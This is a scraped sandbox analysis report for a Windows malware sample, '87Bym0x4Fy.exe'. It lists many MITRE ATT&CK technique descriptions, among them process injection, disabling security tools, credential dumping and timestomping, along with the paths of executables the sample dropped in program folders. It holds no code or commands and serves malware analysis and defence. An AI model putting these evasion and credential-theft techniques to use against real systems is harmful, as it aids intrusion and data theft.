Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 87Bym0x4Fy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\21b1a557fd31cc

C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe

C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe

C:\Program Files (x86)\Windows Mail\fdacde7dce6975

Windows Analysis Report
87Bym0x4Fy.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre